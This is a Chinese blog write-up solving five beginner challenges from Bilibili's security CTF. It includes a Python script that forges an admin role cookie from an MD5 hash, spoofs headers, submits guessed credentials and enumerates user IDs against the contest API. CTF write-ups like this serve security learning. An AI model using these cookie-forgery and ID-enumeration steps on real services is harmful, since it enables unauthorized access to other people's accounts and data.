哔哩哔哩首届安全挑战赛1-5题解答

10月24日是程序员节,很多网站也推出了相关活动庆祝这个程序员的节日。B站也借这个时间推出了B站的首届安全挑战赛,正好我之前玩过Jetbrains那个谜题解答,对这类解密活动很感兴趣,所以就研究了一下,也参考了不少朋友的思路。最后让我为大家分享一下前5道比较简单题目的解答,后面的题目难度较高,目前还没有确定的思路,所以就不管它了。

再来谈谈这个安全挑战赛本身,其实也是由来已久。和ACM等比赛类似,安全挑战赛通过一些题目来考察参赛者的信息安全技术,要根据题目去寻找漏洞,发现隐藏在题目背后的标志,这个过程称作capture the flag。下面题目中涉及的ctf,正是这个过程的简称。

B站的这次活动网址如下,如果有兴趣的话,可以先自己尝试一下,实在做不出来了,在参考网络上的答案。

http://45.113.201.36/start.html

第一题:页面的背后是什么

打开题目所指的网页,会看到这么一个页面。

第一题页面

看起来什么也没有,根据题目的提示,按F12开发者工具查看网页源代码,可以看到flag1也就是问题1的答案,就隐藏在页面代码之中。


网页源代码

第二题:真正的秘密只有特殊的设备才能看到

第二题的网页仍然是这个页面,但是这次要寻找的就是flag2。这里其实我胡思乱想了很多,其实思路很简单,按照页面中的提示用B站浏览器访问,但是实际上并没有这个所谓的浏览器应用。那么答案就很明显了,将浏览器的useragent修改成这个就好了嘛。

这也同样可以用F12开发者工具解决,先调出Console Drawer,然后点击其旁边的三个点也就是“更多工具”按钮,然后选择Network Conditions,在里面自定义浏览器UA,改成页面中提示的bilibili Security Browser即可。


修改浏览器UA

然后刷新网页,就可以看到flag2已经出现了。


刷新网页

第三题:密码是啥

这次的问题其实非常简单,如果运气好试几次密码就可以蒙出来,正确的用户名和密码是admin和bilibili,输入即可。这里我蒙了好几次,都恰好和答案擦肩而过。最后没想到答案这么简单,其实这道题理论上应该使用SQL注入等技术来做,不过目前没有什么思路,所以就先这样吧。

密码是什么

第四题:对不起,权限不足

好吧,这道题其实我应该很容易就做出来,但是之前研究Spring Security和Shiro的时候我嫌麻烦直接跳过了,所以并没有思路。Shiro这些权限验证框架可以非常轻松的让应用实现相关功能,一般会在HTTP请求头上做一些手脚,加一些自定义字段在服务器验证。

权限不足

这道题也是如此,在开发者工具中切换到网络选项卡,然后刷新一下网页,重新捕获一下请求过程,就可以在Cookie中发现端倪。这次发现多了一个role字段,后面应该是一串加密过的信息,于是我们尝试解密。

F12网络调试工具

现在网络上有很多在线的解密工具,这里我用的是cmd5这个网站,输入密文即可解密。如果你有经验的话,可以猜到这其实就是一个MD5加密字符串,自己尝试几次就可以发现这段密文代表的是user。

cmd5在线解密

根据网页的提示,现在要做的就是把管理员转换成md5密文,然后替换这里的role值即可。你可能尝试admin,superadmin等几个字符串,但是其实真正的答案是Administrator,这一点比较坑。MD5加密之后的结果是7b7bc2512ee1fedcd76bdc68926d4f7b,然后在F12开发者工具中替换cookie。然后刷新页面,就可以看到答案了。

修改role

第五题:别人的秘密

这次可以看到页面上没有任何信息,所以照例先用F12开发者工具探查一下。


别人的秘密

很快就可以发现页面里有这么一段JS代码,大概意思就是某个uid会返回正确的结果。其实说白了就是让你批量查询一下。


隐藏的JS代码

那么我们就编写Python代码来查询一下吧,代码大概长这个样子,这段代码用到了requests类库,需要自己先安装一下。运行完毕之后,就会查到正确的flag了。

start_uid = 100336889
for i in range(start_uid, start_uid+100):
    response = requests.get(
        'http://45.113.201.36/api/ctf/5', cookies=cookies, params={'uid': i})
    if response.json()['code'] == 200:
        pprint(response.json())
        break

相信很多朋友肯定懒得动手,又想玩一玩这个比赛。所以我把前五题的答案写成了Python代码,需要的可以自取。

# B站首届安全挑战赛

import requests
from pprint import pprint
import hashlib

# 从浏览器获取自己的B站session
bilibili_session = ''
cookies = {'session': bilibili_session,
           'role': hashlib.md5(b'Administrator').hexdigest()}


def flag1():
    response = requests.get('http://45.113.201.36/api/admin', cookies=cookies)
    pprint(response.json())


def flag2():
    response = requests.get('http://45.113.201.36/api/ctf/2', cookies=cookies,
                            headers={'User-Agent': 'bilibili Security Browser'})
    pprint(response.json())


def flag3():
    response = requests.post(
        'http://45.113.201.36/api/ctf/3', cookies=cookies,
        headers={'Content-Type': 'application/json'}, json={'username': 'admin', 'passwd': 'bilibili'})
    pprint(response.json())


def flag4():
    response = requests.get('http://45.113.201.36/api/ctf/4', cookies=cookies)
    pprint(response.json())


def flag5():
    start_uid = 100336889
    for i in range(start_uid, start_uid+100):
        response = requests.get(
            'http://45.113.201.36/api/ctf/5', cookies=cookies, params={'uid': i})
        if response.json()['code'] == 200:
            pprint(response.json())
            break


flag1()
flag2()
flag3()
flag4()
flag5()
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 142,680评论 1 300
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 61,177评论 1 256
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 94,249评论 0 212
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 40,981评论 0 175
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 48,746评论 1 255
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 38,763评论 1 176
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 30,362评论 2 268
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 29,151评论 0 165
  • 想象着我的养父在大火中拼命挣扎,窒息,最后皮肤化为焦炭。我心中就已经是抑制不住地欢快,这就叫做以其人之道,还治其人...
    爱写小说的胖达阅读 28,964评论 6 229
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 32,501评论 0 213
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 29,285评论 2 215
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 30,614评论 1 229
  • 白月光回国,霸总把我这个替身辞退。还一脸阴沉的警告我。[不要出现在思思面前, 不然我有一百种方法让你生不如死。]我...
    爱写小说的胖达阅读 24,232评论 0 31
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 27,117评论 2 213
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 31,498评论 3 204
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 25,615评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,012评论 0 167
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 33,512评论 2 230
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 33,594评论 2 231

推荐阅读更多精彩内容